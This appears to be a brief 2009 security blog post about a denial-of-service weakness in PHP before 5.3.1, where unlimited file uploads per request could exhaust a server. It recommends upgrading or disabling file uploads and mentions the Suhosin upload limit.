November 24, 2009

Denial of Service in PHP

It was about time, that the PHP team finally included a max_file_uploads directive to limit the number of file upload per request (default is of 20). (cf. http://www.php.net/ChangeLog-5.php#5.3.1)

Until PHP 5.3.1, it was possible to send an X number of file upload request thus creating an X amount of temporary file on the targeted system.. which would cause the web server to crash and the system to overload.

PHP-suhosin has already a max upload option “suhosin.upload.max_uploads” (default to 25), therefore systems with the suhosin patch are protected.

Recommendation is to apply the 5.3.1 release with the patch provided by PHP or to disable file_uploads in php.ini if not using file upload. Keep in mind, you do not need a file upload form on your site to not be vulnerable… all it takes is sending a multipart/form-data mime type to the php script as defined in RCF 1867